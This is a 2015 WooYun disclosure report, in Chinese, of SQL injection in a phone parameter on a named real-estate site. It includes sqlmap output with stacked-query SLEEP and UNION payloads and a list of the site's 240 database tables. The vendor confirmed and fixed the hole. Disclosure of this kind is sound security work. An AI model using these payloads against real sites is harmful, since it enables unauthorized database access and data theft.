当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144612

漏洞标题:化龙巷某站存在SQL注入可UNION

相关厂商:化龙巷

漏洞作者: 路人甲

提交时间:2015-10-03 11:02

修复时间:2015-11-20 16:02

公开时间:2015-11-20 16:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-03: 细节已通知厂商并且等待厂商处理中
2015-10-06: 厂商已经确认,细节仅向厂商公开
2015-10-16: 细节向核心白帽子及相关领域专家公开
2015-10-26: 细节向普通白帽子公开
2015-11-05: 细节向实习白帽子公开
2015-11-20: 细节向公众公开

简要描述:

详细说明:

http://fang.hualongxiang.com/find/2?phone=555-666-0606

11.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: phone (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: phone=555-666-0606';(SELECT * FROM (SELECT(SLEEP(5)))aDow)#
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: phone=555-666-0606' UNION ALL SELECT CONCAT(0x7162626b71,0x457453705159534c694c,0x7170766271),NULL,NULL,NULL,NULL,NULL,NULL--
---
back-end DBMS: MySQL 5.0.11
Database: hlxapp
[240 tables]
+--------------------------------+
| session |
| ad_advent |
| ad_bx |
| ad_cfirm |
| ad_class |
| ad_ind |
| ad_menu |
| ad_mes |
| ad_user |
| bk_mes |
| bk_nback |
| bosslog |
| euro_games |
| euro_guess |
| euro_guesscount |
| feeback_class |
| feeback_data |
| hsk_booking |
| hsk_category |
| hsk_msg |
| hsk_shopinfo |
| module_adsarea |
| module_adsview |
| module_analytic |
| module_appoint_queue |
| module_article |
| module_article_category |
| module_article_source |
| module_black |
| module_call_log |
| module_car_artrecom |
| module_car_configs |
| module_car_dis |
| module_car_disrelation |
| module_car_due |
| module_car_hd_atlas |
| module_car_hd_case |
| module_car_hd_pic |
| module_car_hd_store |
| module_car_houdao |
| module_car_images |
| module_car_model |
| module_car_order |
| module_car_promo |
| module_car_recom |
| module_car_relation |
| module_car_reply |
| module_car_series |
| module_car_shop |
| module_car_shopcon |
| module_category |
| module_chest |
| module_cms_admin |
| module_cms_category |
| module_cms_content |
| module_collect |
| module_comments |
| module_coupons |
| module_edu_due |
| module_edu_qiuxue |
| module_edu_train |
| module_erp_loginlog |
| module_erp_refreshlog |
| module_family_album |
| module_family_ask |
| module_family_askcate |
| module_family_atlas |
| module_family_case |
| module_family_images |
| module_family_order |
| module_family_order_rel |
| module_family_pic |
| module_family_plot |
| module_family_pump |
| module_family_reply |
| module_family_shop |
| module_family_store |
| module_family_tag |
| module_family_tag_category |
| module_family_tag_relation |
| module_family_team |
| module_family_visit |
| module_family_work |
| module_forms |
| module_gift |
| module_go |
| module_goodinfo |
| module_groups |
| module_hit_count |
| module_house_activities |
| module_house_appoint |
| module_house_buy |
| module_house_daily |
| module_house_extension |
| module_house_extension_sms |
| module_house_images |
| module_house_info |
| module_house_jike |
| module_house_jike_log |
| module_house_jike_plot |
| module_house_jike_source |
| module_house_log |
| module_house_peizhi |
| module_house_peizhi_relation |
| module_house_priceinfo |
| module_house_report |
| module_house_sale |
| module_house_school |
| module_house_school_relation |
| module_house_shop_extra |
| module_house_staff_extra |
| module_house_tag |
| module_house_tag_type |
| module_house_tuan |
| module_house_wenda |
| module_house_wenda_category |
| module_house_yzm |
| module_images |
| module_invite |
| module_jifen_exchange |
| module_jifen_goods |
| module_jifen_images |
| module_jifen_user |
| module_keyword |
| module_live |
| module_live_pic |
| module_liveinfo |
| module_lott_info |
| module_lott_invite |
| module_lott_option |
| module_lott_value |
| module_ly_action_log |
| module_ly_customer_asks |
| module_ly_customer_collections |
| module_ly_customer_infos |
| module_ly_line |
| module_ly_linedate |
| module_ly_linedue |
| module_ly_linetravel |
| module_ly_pos |
| module_ly_qq_log |
| module_ly_recs |
| module_ly_search_count |
| module_ly_search_detail |
| module_ly_tag_lists |
| module_ly_tag_relationships |
| module_ly_visa |
| module_ly_visa_due |
| module_marry_album |
| module_marry_album_tmp |
| module_marry_cate |
| module_marry_click |
| module_marry_ding |
| module_marry_ding_relation |
| module_marry_due |
| module_marry_extension |
| module_marry_hc |
| module_marry_image |
| module_marry_log |
| module_marry_logg |
| module_marry_order |
| module_marry_order_ext |
| module_marry_order_relation |
| module_marry_page |
| module_marry_recommend |
| module_marry_shop |
| module_marry_user |
| module_marry_visit |
| module_members |
| module_message |
| module_money |
| module_notice |
| module_options |
| module_page |
| module_pai_info |
| module_pai_members |
| module_pai_relation |
| module_pai_value |
| module_phone |
| module_recommend |
| module_sale_brand |
| module_sale_cate |
| module_sale_due |
| module_sale_forms |
| module_sale_option |
| module_sale_type |
| module_sellrecord |
| module_shop |
| module_shop_qq_hits |
| module_signbar |
| module_special |
| module_staff |
| module_tag |
| module_tags |
| module_tags_relation |
| module_tour_area |
| module_tour_line |
| module_tour_linedate |
| module_tour_linedue |
| module_tour_linetravel |
| module_tour_place |
| module_values |
| plot_sale |
| plot_sale_right |
| plot_temp |
| reg_active |
| reg_admin |
| reg_group |
| reg_order |
| reg_pay |
| reg_reward |
| reg_shop |
| reg_sign |
| reg_user |
| s_forbid_fid |
| s_forbid_tid |
| s_kword |
| s_kword_ad |
| s_uslog |
| sqlmapfile |
| veryide_admins |
| veryide_admins_majia |
| veryide_cfiles |
| veryide_files |
| veryide_groups |
| veryide_logs |
| veryide_menus |
| veryide_sys |
| vol_admin |
| vol_events |
| vol_volunteer |
| wall_property |
| wall_user |
| wechat_actives |
| wechat_activevotes |
| wechat_floors |
| wechat_records |
| wechat_threads |
| wechat_userbind |
| wechat_userstatus |
+--------------------------------+

12.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-06 16:01

厂商回复:

感谢对化龙巷安全的关注,确认存在漏洞,目前已修复!

最新状态:

暂无